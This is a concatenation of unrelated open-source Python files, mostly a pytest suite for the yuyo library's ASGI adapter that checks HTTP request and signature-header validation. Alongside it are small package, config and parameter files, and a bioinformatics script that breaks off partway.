(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 31
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 32
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 33
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 34
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 35
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 36
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 37
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 38
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 39
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 40
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 41
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 42
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 43
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 44
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 45
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 46
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 47
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 48
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 49
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 50
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 51
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 52
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 53
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 54
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 55
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 56
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 57
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 58
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 59
)
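The table above is 60 identical rows. If this file is hand-maintained rather than machine-generated, an equivalent programmatic construction may be easier to audit. This is a sketch under that assumption; the names below (`ROW`, `passenger_alighting_rate`) are illustrative, not taken from the original generator:

```python
# One row: rate 0 and 1 bracket four equal per-line rates of 1/6,
# and the 12-wide row is that 6-wide pattern repeated twice.
# Note: 1/6 is exactly the float 0.16666666666666666 used in the literal table.
ROW = (0, 1 / 6, 1 / 6, 1 / 6, 1 / 6, 1) * 2

# 60 stops, each sharing the same alighting-rate row.
passenger_alighting_rate = tuple(ROW for _ in range(60))
```

Because `1/6` rounds to the same binary float written out in the literals, the generated tuple compares equal element-for-element with the explicit table.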
"""
Parameters for reproducibility. More information: https://numpy.org/doc/stable/reference/random/parallel.html
"""
# Initial entropy
entropy = 258194110137029475889902652135037600173
# Indices of the seed-sequence children to use
child_seed_index = (
1, # 0
2, # 1
)
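Following the linked NumPy parallel-generation docs, the `entropy` and `child_seed_index` constants above can rebuild the same independent random streams on every run. A minimal sketch, assuming the values are consumed as below (the variable names are illustrative):

```python
import numpy as np

ENTROPY = 258194110137029475889902652135037600173
CHILD_SEED_INDEX = (1, 2)

# A SeedSequence built from the same entropy always spawns the same children,
# so selecting children by index yields reproducible, independent generators.
root = np.random.SeedSequence(ENTROPY)
children = root.spawn(max(CHILD_SEED_INDEX) + 1)
rngs = [np.random.default_rng(children[i]) for i in CHILD_SEED_INDEX]
```

Each generator in `rngs` draws a stream that is statistically independent of the others yet identical across runs, which is the point of recording the entropy and child indices.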

# tests/health.py — sjezewski/pypachy (Apache-2.0)
#!/usr/bin/env python
"""Tests for health-related functionality."""
import python_pachyderm
def test_health():
python_pachyderm.Client().health()

# home/admin.py — mamad-azimi-jozani/charity_django_blog (MIT)
from django.contrib import admin
from .models import Contact
# Register your models here.
@admin.register(Contact)
class AdminContact(admin.ModelAdmin):
pass

# services/projects/api/v1/__init__.py — amthorn/qutex (MIT)
from api.v1 import projects # noqa

# tests/test_asgi.py — FasterSpeeding/Yuyo (BSD-3-Clause)
# -*- coding: utf-8 -*-
# cython: language_level=3
# BSD 3-Clause License
#
# Copyright (c) 2020-2021, Faster Speeding
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import traceback
from unittest import mock
import asgiref.typing
import hikari
import pytest
import yuyo
class TestAsgiAdapter:
@pytest.fixture()
def stub_server(self) -> hikari.api.InteractionServer:
return mock.AsyncMock()
@pytest.fixture()
def adapter(self, stub_server: hikari.api.InteractionServer) -> yuyo.AsgiAdapter:
return yuyo.AsgiAdapter(stub_server)
def test_server_property(self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer) -> None:
assert adapter.server is stub_server
@pytest.fixture()
def http_scope(self) -> asgiref.typing.HTTPScope:
return asgiref.typing.HTTPScope(
type="http",
asgi=asgiref.typing.ASGIVersions(spec_version="ok", version="3.0"),
http_version="1.1",
method="POST",
scheme="",
path="/",
raw_path=b"",
headers=[],
client=("", 1),
server=("", 1),
extensions=None,
query_string=b"",
root_path="",
)
@pytest.mark.asyncio()
async def test___call___when_http(
self, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
) -> None:
mock_process_request = mock.AsyncMock()
mock_receive = mock.Mock()
mock_send = mock.Mock()
class StubAdapter(yuyo.AsgiAdapter):
process_request = mock_process_request
stub_adapter = StubAdapter(stub_server)
await stub_adapter(http_scope, mock_receive, mock_send)
mock_process_request.assert_awaited_once_with(http_scope, mock_receive, mock_send)
@pytest.mark.asyncio()
async def test___call___when_lifespan(self, stub_server: hikari.api.InteractionServer):
mock_process_lifespan_event = mock.AsyncMock()
mock_receive = mock.Mock()
mock_send = mock.Mock()
mock_scope = asgiref.typing.LifespanScope(
type="lifespan", asgi=asgiref.typing.ASGIVersions(spec_version="ok", version="3.0")
)
class StubAdapter(yuyo.AsgiAdapter):
process_lifespan_event = mock_process_lifespan_event
stub_adapter = StubAdapter(stub_server)
await stub_adapter(mock_scope, mock_receive, mock_send)
mock_process_lifespan_event.assert_awaited_once_with(mock_receive, mock_send)
@pytest.mark.asyncio()
async def test___call___when_webhook(self, adapter: yuyo.AsgiAdapter):
with pytest.raises(NotImplementedError, match="Websocket operations are not supported"):
await adapter(
asgiref.typing.WebSocketScope(
type="websocket",
asgi=asgiref.typing.ASGIVersions(spec_version="ok", version="3.0"),
http_version="...",
scheme="...",
path="/",
raw_path=b"",
query_string=b"",
root_path="",
headers=[],
client=("2", 2),
server=None,
subprotocols=[],
extensions={},
),
mock.AsyncMock(),
mock.AsyncMock(),
)
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_startup(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.startup"})
mock_send = mock.AsyncMock()
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.startup.complete"})
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_startup_with_callbacks(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.startup"})
mock_send = mock.AsyncMock()
mock_async_callback = mock.AsyncMock()
mock_callback = mock.Mock()
adapter.add_startup_callback(mock_async_callback).add_startup_callback(mock_callback)
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_async_callback.assert_awaited_once_with()
mock_callback.assert_called_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.startup.complete"})
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_startup_when_sync_callback_fails(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.startup"})
mock_send = mock.AsyncMock()
mock_async_callback = mock.AsyncMock(side_effect=Exception("test"))
mock_callback = mock.Mock()
adapter.add_startup_callback(mock_async_callback).add_startup_callback(mock_callback)
with mock.patch.object(traceback, "format_exc") as format_exc:
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_async_callback.assert_awaited_once_with()
mock_callback.assert_called_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.startup.failed", "message": format_exc.return_value})
format_exc.assert_called_once_with()
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_startup_when_async_callback_fails(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.startup"})
mock_send = mock.AsyncMock()
mock_async_callback = mock.AsyncMock()
mock_callback = mock.Mock(side_effect=Exception("test"))
adapter.add_startup_callback(mock_async_callback).add_startup_callback(mock_callback)
with mock.patch.object(traceback, "format_exc") as format_exc:
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_async_callback.assert_awaited_once_with()
mock_callback.assert_called_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.startup.failed", "message": format_exc.return_value})
format_exc.assert_called_once_with()
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_shutdown(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.shutdown"})
mock_send = mock.AsyncMock()
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.shutdown.complete"})
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_shutdown_with_callbacks(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.shutdown"})
mock_send = mock.AsyncMock()
mock_async_callback = mock.AsyncMock()
mock_callback = mock.Mock()
adapter.add_shutdown_callback(mock_async_callback).add_shutdown_callback(mock_callback)
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_async_callback.assert_awaited_once_with()
mock_callback.assert_called_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.shutdown.complete"})
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_shutdown_when_sync_callback_fails(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.shutdown"})
mock_send = mock.AsyncMock()
mock_async_callback = mock.AsyncMock(side_effect=Exception("test"))
mock_callback = mock.Mock()
adapter.add_shutdown_callback(mock_async_callback).add_shutdown_callback(mock_callback)
with mock.patch.object(traceback, "format_exc") as format_exc:
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_async_callback.assert_awaited_once_with()
mock_callback.assert_called_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.shutdown.failed", "message": format_exc.return_value})
format_exc.assert_called_once_with()
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_shutdown_when_async_callback_fails(
self, adapter: yuyo.AsgiAdapter
) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.shutdown"})
mock_send = mock.AsyncMock()
mock_async_callback = mock.AsyncMock()
mock_callback = mock.Mock(side_effect=Exception("test"))
adapter.add_shutdown_callback(mock_async_callback).add_shutdown_callback(mock_callback)
with mock.patch.object(traceback, "format_exc") as format_exc:
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_async_callback.assert_awaited_once_with()
mock_callback.assert_called_once_with()
mock_send.assert_awaited_once_with({"type": "lifespan.shutdown.failed", "message": format_exc.return_value})
format_exc.assert_called_once_with()
@pytest.mark.asyncio()
async def test_process_lifespan_event_on_invalid_lifespan_type(self, adapter: yuyo.AsgiAdapter) -> None:
mock_receive = mock.AsyncMock(return_value={"type": "lifespan.idk"})
mock_send = mock.AsyncMock()
with pytest.raises(RuntimeError, match="Unknown lifespan event lifespan.idk"):
await adapter.process_lifespan_event(mock_receive, mock_send)
mock_receive.assert_awaited_once_with()
mock_send.assert_not_called()
@pytest.mark.asyncio()
async def test_process_request(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
http_scope["headers"] = [
(b"Content-Type", b"application/json"),
(b"x-signature-timestamp", b"321123"),
(b"random-header2", b"random value"),
(b"x-signature-ed25519", b"6e796161"),
(b"random-header", b"random value"),
]
mock_receive = mock.AsyncMock(
side_effect=[{"body": b"cat", "more_body": True}, {"body": b"girls", "more_body": False}]
)
mock_send = mock.AsyncMock()
stub_server.on_interaction.return_value.headers = {
"Content-Type": "jazz hands",
"kill": "me baby",
"I am the milk man": "my milk is delicious",
"and the sea shall run white": "with his rage",
}
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": stub_server.on_interaction.return_value.status_code,
"headers": [
(b"Content-Type", b"jazz hands"),
(b"kill", b"me baby"),
(b"I am the milk man", b"my milk is delicious"),
(b"and the sea shall run white", b"with his rage"),
],
}
),
mock.call(
{
"type": "http.response.body",
"body": stub_server.on_interaction.return_value.payload,
"more_body": False,
}
),
]
)
mock_receive.assert_has_awaits([mock.call(), mock.call()])
stub_server.on_interaction.assert_awaited_once_with(bytearray(b"catgirls"), b"nyaa", b"321123")
@pytest.mark.asyncio()
async def test_process_request_when_not_post(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
http_scope["method"] = "GET"
http_scope["path"] = "/"
mock_receive = mock.AsyncMock()
mock_send = mock.AsyncMock()
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": 404,
"headers": [(b"content-type", b"text/plain; charset=UTF-8")],
}
),
mock.call({"type": "http.response.body", "body": b"Not found", "more_body": False}),
]
)
mock_receive.assert_not_called()
stub_server.on_interaction.assert_not_called()
@pytest.mark.asyncio()
async def test_process_request_when_not_base_route(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
http_scope["method"] = "POST"
http_scope["path"] = "/not-base-route"
mock_receive = mock.AsyncMock()
mock_send = mock.AsyncMock()
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": 404,
"headers": [(b"content-type", b"text/plain; charset=UTF-8")],
}
),
mock.call({"type": "http.response.body", "body": b"Not found", "more_body": False}),
]
)
mock_receive.assert_not_called()
stub_server.on_interaction.assert_not_called()
@pytest.mark.asyncio()
async def test_process_request_when_no_body(
self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
):
mock_receive = mock.AsyncMock(return_value={"body": b"", "more_body": False})
mock_send = mock.AsyncMock()
await adapter.process_request(http_scope, mock_receive, mock_send)
mock_send.assert_has_awaits(
[
mock.call(
{
"type": "http.response.start",
"status": 400,
"headers": [(b"content-type", b"text/plain; charset=UTF-8")],
}
),
mock.call({"type": "http.response.body", "body": b"POST request must have a body", "more_body": False}),
]
)
mock_receive.assert_awaited_once_with()
stub_server.on_interaction.assert_not_called()
    @pytest.mark.asyncio()
    async def test_process_request_when_no_body_and_receive_empty(
        self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
    ):
        mock_receive = mock.AsyncMock(return_value={})
        mock_send = mock.AsyncMock()
        await adapter.process_request(http_scope, mock_receive, mock_send)
        mock_send.assert_has_awaits(
            [
                mock.call(
                    {
                        "type": "http.response.start",
                        "status": 400,
                        "headers": [(b"content-type", b"text/plain; charset=UTF-8")],
                    }
                ),
                mock.call({"type": "http.response.body", "body": b"POST request must have a body", "more_body": False}),
            ]
        )
        mock_receive.assert_awaited_once_with()
        stub_server.on_interaction.assert_not_called()

    @pytest.mark.asyncio()
    async def test_process_request_when_no_content_type(
        self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
    ):
        http_scope["headers"] = []
        mock_receive = mock.AsyncMock(return_value={"body": b"gay", "more_body": False})
        mock_send = mock.AsyncMock()
        await adapter.process_request(http_scope, mock_receive, mock_send)
        mock_send.assert_has_awaits(
            [
                mock.call(
                    {
                        "type": "http.response.start",
                        "status": 400,
                        "headers": [(b"content-type", b"text/plain; charset=UTF-8")],
                    }
                ),
                mock.call(
                    {"type": "http.response.body", "body": b"Content-Type must be application/json", "more_body": False}
                ),
            ]
        )
        mock_receive.assert_awaited_once_with()
        stub_server.on_interaction.assert_not_called()

    @pytest.mark.asyncio()
    async def test_process_request_when_not_json_content_type(
        self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
    ):
        http_scope["headers"] = [(b"Content-Type", b"NOT JSON")]
        mock_receive = mock.AsyncMock(return_value={"body": b"gay", "more_body": False})
        mock_send = mock.AsyncMock()
        await adapter.process_request(http_scope, mock_receive, mock_send)
        mock_send.assert_has_awaits(
            [
                mock.call(
                    {
                        "type": "http.response.start",
                        "status": 400,
                        "headers": [(b"content-type", b"text/plain; charset=UTF-8")],
                    }
                ),
                mock.call(
                    {"type": "http.response.body", "body": b"Content-Type must be application/json", "more_body": False}
                ),
            ]
        )
        mock_receive.assert_awaited_once_with()
        stub_server.on_interaction.assert_not_called()
    @pytest.mark.asyncio()
    async def test_process_request_when_missing_timestamp_header(
        self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
    ):
        http_scope["headers"] = [(b"Content-Type", b"application/json"), (b"x-signature-ed25519", b"676179")]
        mock_receive = mock.AsyncMock(return_value={"body": b"gay", "more_body": False})
        mock_send = mock.AsyncMock()
        await adapter.process_request(http_scope, mock_receive, mock_send)
        mock_send.assert_has_awaits(
            [
                mock.call(
                    {
                        "type": "http.response.start",
                        "status": 400,
                        "headers": [(b"content-type", b"text/plain; charset=UTF-8")],
                    }
                ),
                mock.call(
                    {
                        "type": "http.response.body",
                        "body": b"Missing required request signature header(s)",
                        "more_body": False,
                    }
                ),
            ]
        )
        mock_receive.assert_awaited_once_with()
        stub_server.on_interaction.assert_not_called()

    @pytest.mark.asyncio()
    async def test_process_request_when_missing_ed25519_header(
        self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
    ):
        http_scope["headers"] = [(b"Content-Type", b"application/json"), (b"x-signature-timestamp", b"87")]
        mock_receive = mock.AsyncMock(return_value={"body": b"gay", "more_body": False})
        mock_send = mock.AsyncMock()
        await adapter.process_request(http_scope, mock_receive, mock_send)
        mock_send.assert_has_awaits(
            [
                mock.call(
                    {
                        "type": "http.response.start",
                        "status": 400,
                        "headers": [(b"content-type", b"text/plain; charset=UTF-8")],
                    }
                ),
                mock.call(
                    {
                        "type": "http.response.body",
                        "body": b"Missing required request signature header(s)",
                        "more_body": False,
                    }
                ),
            ]
        )
        mock_receive.assert_awaited_once_with()
        stub_server.on_interaction.assert_not_called()

    @pytest.mark.parametrize("header_value", ["🇯🇵".encode(), b"trans"])
    @pytest.mark.asyncio()
    async def test_process_request_when_ed_25519_header_not_valid(
        self,
        adapter: yuyo.AsgiAdapter,
        stub_server: hikari.api.InteractionServer,
        http_scope: asgiref.typing.HTTPScope,
        header_value: bytes,
    ):
        http_scope["headers"] = [
            (b"Content-Type", b"application/json"),
            (b"x-signature-timestamp", b"87"),
            (b"x-signature-ed25519", header_value),
        ]
        mock_receive = mock.AsyncMock(return_value={"body": b"gay", "more_body": False})
        mock_send = mock.AsyncMock()
        await adapter.process_request(http_scope, mock_receive, mock_send)
        mock_send.assert_has_awaits(
            [
                mock.call(
                    {
                        "type": "http.response.start",
                        "status": 400,
                        "headers": [(b"content-type", b"text/plain; charset=UTF-8")],
                    }
                ),
                mock.call(
                    {
                        "type": "http.response.body",
                        "body": b"Invalid ED25519 signature header found",
                        "more_body": False,
                    }
                ),
            ]
        )
        mock_receive.assert_awaited_once_with()
        stub_server.on_interaction.assert_not_called()
    @pytest.mark.asyncio()
    async def test_process_request_when_on_interaction_raises(
        self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
    ):
        http_scope["headers"] = [
            (b"x-signature-timestamp", b"653245"),
            (b"random-header2", b"random value"),
            (b"x-signature-ed25519", b"7472616e73"),
            (b"random-header", b"random value"),
            (b"Content-Type", b"application/json"),
        ]
        mock_receive = mock.AsyncMock(return_value={"body": b"transive", "more_body": False})
        mock_send = mock.AsyncMock()
        stub_error = Exception("💩")
        stub_server.on_interaction.side_effect = stub_error
        with pytest.raises(Exception, match=".*") as exc_info:
            await adapter.process_request(http_scope, mock_receive, mock_send)
        assert exc_info.value is stub_error
        mock_send.assert_has_awaits(
            [
                mock.call(
                    {
                        "type": "http.response.start",
                        "status": 500,
                        "headers": [(b"content-type", b"text/plain; charset=UTF-8")],
                    }
                ),
                mock.call(
                    {
                        "type": "http.response.body",
                        "body": b"Internal Server Error",
                        "more_body": False,
                    }
                ),
            ]
        )
        mock_receive.assert_awaited_once_with()
        stub_server.on_interaction.assert_awaited_once_with(b"transive", b"trans", b"653245")

    @pytest.mark.asyncio()
    async def test_process_request_when_no_response_headers_or_body(
        self, adapter: yuyo.AsgiAdapter, stub_server: hikari.api.InteractionServer, http_scope: asgiref.typing.HTTPScope
    ):
        http_scope["headers"] = [
            (b"Content-Type", b"application/json"),
            (b"random-header2", b"random value"),
            (b"x-signature-ed25519", b"6e796161"),
            (b"x-signature-timestamp", b"321123"),
            (b"random-header", b"random value"),
        ]
        mock_receive = mock.AsyncMock(
            side_effect=[{"body": b"cat", "more_body": True}, {"body": b"girls", "more_body": False}]
        )
        mock_send = mock.AsyncMock()
        stub_server.on_interaction.return_value.payload = None
        stub_server.on_interaction.return_value.headers = None
        await adapter.process_request(http_scope, mock_receive, mock_send)
        mock_send.assert_has_awaits(
            [
                mock.call(
                    {
                        "type": "http.response.start",
                        "status": stub_server.on_interaction.return_value.status_code,
                        "headers": [],
                    }
                ),
                mock.call(
                    {
                        "type": "http.response.body",
                        "body": b"",
                        "more_body": False,
                    }
                ),
            ]
        )
        mock_receive.assert_has_awaits([mock.call(), mock.call()])
        stub_server.on_interaction.assert_awaited_once_with(bytearray(b"catgirls"), b"nyaa", b"321123")
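The tests above all follow one pattern: drive an ASGI callable with `unittest.mock.AsyncMock` receive/send callables, then assert on the exact awaited calls. A minimal self-contained sketch of that pattern (the `not_found_app` coroutine is a hypothetical stand-in, not yuyo's actual `AsgiAdapter`):

```python
import asyncio
from unittest import mock


async def not_found_app(scope, receive, send):
    # Hypothetical stand-in for the adapter's 404 branch: emits the same
    # two ASGI events the real tests assert on.
    await send(
        {
            "type": "http.response.start",
            "status": 404,
            "headers": [(b"content-type", b"text/plain; charset=UTF-8")],
        }
    )
    await send({"type": "http.response.body", "body": b"Not found", "more_body": False})


mock_send = mock.AsyncMock()
asyncio.run(not_found_app({"path": "/nope"}, mock.AsyncMock(), mock_send))

# assert_has_awaits checks the awaited calls in order, exactly as above.
mock_send.assert_has_awaits(
    [
        mock.call(
            {
                "type": "http.response.start",
                "status": 404,
                "headers": [(b"content-type", b"text/plain; charset=UTF-8")],
            }
        ),
        mock.call({"type": "http.response.body", "body": b"Not found", "more_body": False}),
    ]
)
```

Because `AsyncMock` records awaits rather than calls, `assert_has_awaits`/`assert_awaited_once_with` are the right assertions here, not their `call` counterparts.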
# --- src/crud/__init__.py (week-with-me/fastapi-mongodb, MIT) ---
from src.crud.question import question_crud
# --- text/color/tone/tones.py (jedhsu/text, Apache-2.0) ---
"""
*Tones*
"""
# --- thepeer/__init__.py (sirrobot01/thepeer-python, MIT) ---
from peer import ThePeer
# --- RecoBTag/CSVscikit/python/csvscikit_cff.py (flodamas/cmssw, Apache-2.0) ---
# CSVscikit tagger
from RecoBTag.CSVscikit.csvscikit_EventSetup_cff import *
from RecoBTag.CSVscikit.pfInclusiveSecondaryVertexFinderCvsLTagInfos_cfi import *
from RecoBTag.CSVscikit.pfInclusiveSecondaryVertexFinderNegativeCvsLTagInfos_cfi import *
from RecoBTag.CSVscikit.pfCombinedSecondaryVertexSoftLeptonCvsLJetTags_cfi import *
from RecoBTag.CSVscikit.pfNegativeCombinedSecondaryVertexSoftLeptonCvsLJetTags_cfi import *
from RecoBTag.CSVscikit.pfPositiveCombinedSecondaryVertexSoftLeptonCvsLJetTags_cfi import *
from RecoBTag.CSVscikit.csvscikitTagJetTags_cfi import * #EDProducer
# --- script/old/gen_techval-0.0.3.py (genepii/seqmet, MIT) ---
#!/usr/bin/env python3
import os
import sys
import argparse
import numpy as np
import pandas as pd
def path_asfileslist(path):
    if os.path.isdir(path):
        files_list = []
        for (dirpath, dirnames, filenames) in os.walk(path):
            files_list.extend(filenames)
        return files_list
    else:
